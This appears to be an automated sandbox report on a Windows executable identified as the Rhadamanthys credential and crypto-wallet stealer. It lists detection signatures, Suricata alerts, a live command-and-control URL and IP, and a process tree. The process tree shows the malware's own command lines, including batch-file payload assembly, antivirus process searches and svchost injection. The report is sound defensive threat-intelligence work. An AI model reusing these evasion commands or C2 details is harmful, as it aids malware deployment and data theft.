Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HI6VIJERUn.exe

Overview

General Information

Sample name:HI6VIJERUn.exe
renamed because original name is a hash value
Original sample name:7f714d1fe31c0e0b58f6e98c86717c8e62dcf722513de35d25e9f31330d4027f.exe
Analysis ID:1577525
MD5:3da674c87aa02f410b79109a2e5b1448
SHA1:a108a3d031e70a8bc706c376115ee9f3aac91508
SHA256:7f714d1fe31c0e0b58f6e98c86717c8e62dcf722513de35d25e9f31330d4027f
Tags:92-255-85-148exeuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query network adapater information
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Dllhost Internet Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • HI6VIJERUn.exe (PID: 3592 cmdline: "C:\Users\user\Desktop\HI6VIJERUn.exe" MD5: 3DA674C87AA02F410B79109A2E5B1448)
    • cmd.exe (PID: 1248 cmdline: "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6588 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3436 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 4612 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6928 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4912 cmdline: cmd /c md 407310 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 5912 cmdline: cmd /c copy /b ..\Tall + ..\Compensation + ..\Limited + ..\Pasta + ..\Patricia + ..\Mac + ..\Terminal + ..\Roommate + ..\Pts + ..\Andorra B MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Hop.com (PID: 5924 cmdline: Hop.com B MD5: C63860691927D62432750013B5A20F5F)
        • Hop.com (PID: 5732 cmdline: C:\Users\user\AppData\Local\Temp\407310\Hop.com MD5: C63860691927D62432750013B5A20F5F)
        • Hop.com (PID: 4120 cmdline: C:\Users\user\AppData\Local\Temp\407310\Hop.com MD5: C63860691927D62432750013B5A20F5F)
          • svchost.exe (PID: 4188 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • chrome.exe (PID: 4828 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr992.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/14c90ac5" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
              • chrome.exe (PID: 2204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2268,i,5510077771295521084,16887318193835122757,262144 /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
            • msedge.exe (PID: 7368 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr1078.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/72f3a0b3" MD5: 69222B8101B0601CC6663F8381E7E00F)
              • msedge.exe (PID: 7676 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2036,i,6499210504756038714,13868593157593711186,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
            • wmplayer.exe (PID: 1948 cmdline: "C:\Program Files\Windows Media Player\wmplayer.exe" MD5: 89DCD2D4C0EC638AADC00D3530E07E1D)
              • dllhost.exe (PID: 7228 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • WerFault.exe (PID: 4380 cmdline: C:\Windows\system32\WerFault.exe -u -p 4120 -s 340 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • choice.exe (PID: 4672 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 7660 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --explicitly-allowed-ports=8000 --disable-gpu --new-window --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate http://127.0.0.1:8000/254d3199/72f3a0b3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7992 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7228 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5092 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3708 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=2952 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7784 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 7804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 8080 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4444 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dt"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    0000000E.00000003.1667413757.00000243663E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        0000000F.00000003.1670933123.000001C276180000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            15.3.svchost.exe.1c2785c0000.5.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              14.3.Hop.com.24368620000.4.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                14.3.Hop.com.24368900000.5.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  15.3.svchost.exe.1c2785c0000.5.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    15.3.svchost.exe.1c2782e0000.4.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      Sigma detected: Dllhost Internet Connection
                      Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 92.255.85.148, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 7228, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49747
                      Sigma detected: Suspicious Copy From or To System Directory
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HI6VIJERUn.exe", ParentImage: C:\Users\user\Desktop\HI6VIJERUn.exe, ParentProcessId: 3592, ParentProcessName: HI6VIJERUn.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd, ProcessId: 1248, ProcessName: cmd.exe
                      Sigma detected: Uncommon Svchost Parent Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\407310\Hop.com, ParentImage: C:\Users\user\AppData\Local\Temp\407310\Hop.com, ParentProcessId: 4120, ParentProcessName: Hop.com, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 4188, ProcessName: svchost.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\407310\Hop.com, ParentImage: C:\Users\user\AppData\Local\Temp\407310\Hop.com, ParentProcessId: 4120, ParentProcessName: Hop.com, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 4188, ProcessName: svchost.exe

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Sigma detected: Search for Antivirus process
                      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1248, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6928, ProcessName: findstr.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-18T14:55:36.913171+010028548242Potentially Bad Traffic92.255.85.1483574192.168.2.1149727TCP
                      2024-12-18T14:55:49.204531+010028548242Potentially Bad Traffic92.255.85.1483574192.168.2.1149746TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-18T14:54:43.088634+010028548021Domain Observed Used for C2 Detected92.255.85.148443192.168.2.1149860TCP
                      2024-12-18T14:55:11.809447+010028548021Domain Observed Used for C2 Detected92.255.85.1483574192.168.2.1149708TCP
                      2024-12-18T14:55:36.913171+010028548021Domain Observed Used for C2 Detected92.255.85.1483574192.168.2.1149727TCP
                      2024-12-18T14:55:49.204531+010028548021Domain Observed Used for C2 Detected92.255.85.1483574192.168.2.1149746TCP
                      2024-12-18T14:55:59.787850+010028548021Domain Observed Used for C2 Detected92.255.85.148443192.168.2.1149747TCP
                      2024-12-18T14:56:07.057109+010028548021Domain Observed Used for C2 Detected92.255.85.148443192.168.2.1149751TCP
                      2024-12-18T14:56:14.345809+010028548021Domain Observed Used for C2 Detected92.255.85.148443192.168.2.1149767TCP
                      2024-12-18T14:56:21.814636+010028548021Domain Observed Used for C2 Detected92.255.85.148443192.168.2.1149784TCP
                      2024-12-18T14:56:29.099375+010028548021Domain Observed Used for C2 Detected92.255.85.148443192.168.2.1149811TCP
                      2024-12-18T14:56:36.355906+010028548021Domain Observed Used for C2 Detected92.255.85.148443192.168.2.1149827TCP
                      2024-12-18T14:56:43.603010+010028548021Domain Observed Used for C2 Detected92.255.85.148443192.168.2.1149844TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 14.3.Hop.com.24366310000.6.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dt"}
                      Multi AV Scanner detection for submitted file
                      Source: HI6VIJERUn.exeReversingLabs: Detection: 55%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.2% probability
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB60F0 CryptUnprotectData,15_3_00007DF426AB60F0
                      Source: HI6VIJERUn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49767 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49827 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49844 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49860 version: TLS 1.2
                      Source: HI6VIJERUn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: kernel32.pdbUGP source: Hop.com, 0000000E.00000003.1669311626.00000243686E0000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669190239.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675738205.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675827080.000001C2783A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: kernelbase.pdbUGP source: Hop.com, 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669666676.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: Hop.com, 0000000E.00000003.1668539645.0000024368810000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1668374308.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000F.00000003.1675250294.000001C2784D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1674864872.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: Hop.com, 0000000E.00000003.1668539645.0000024368810000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1668374308.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675250294.000001C2784D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1674864872.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: kernel32.pdb source: Hop.com, 0000000E.00000003.1669311626.00000243686E0000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669190239.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675738205.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675827080.000001C2783A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdb source: wmplayer.exe, 00000023.00000003.2116953373.0000021AB3300000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000003.2116916350.0000021AB32A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdbGCTL source: wmplayer.exe, 00000023.00000003.2116953373.0000021AB3300000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000003.2116916350.0000021AB32A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: kernelbase.pdb source: Hop.com, 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669666676.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C472DE0 FindFirstFileExW,12_2_00007FF68C472DE0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4ACE3C GetFileAttributesW,FindFirstFileW,FindClose,12_2_00007FF68C4ACE3C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB0B80 calloc,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,15_3_00007DF426AB0B80
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E5BC8 GetLogicalDriveStringsW,QueryDosDeviceW,14_2_00000243665E5BC8
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\407310\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\407310Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                      Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp15_3_00007DF426AC1741
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 4x nop then dec esp35_2_0000021AB2FD5681

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:3574 -> 192.168.2.11:49708
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:3574 -> 192.168.2.11:49727
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:3574 -> 192.168.2.11:49746
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49751
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49747
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49827
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49784
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49767
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49844
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49811
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.148:443 -> 192.168.2.11:49860
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dt
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 92.255.85.148 ports 3574,3,443,4,5,7
                      Source: global trafficTCP traffic: 192.168.2.11:49708 -> 92.255.85.148:3574
                      Source: Joe Sandbox ViewIP Address: 94.245.104.56 94.245.104.56
                      Source: Joe Sandbox ViewIP Address: 129.6.15.28 129.6.15.28
                      Source: Joe Sandbox ViewJA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
                      Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 92.255.85.148:3574 -> 192.168.2.11:49727
                      Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 92.255.85.148:3574 -> 192.168.2.11:49746
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.148
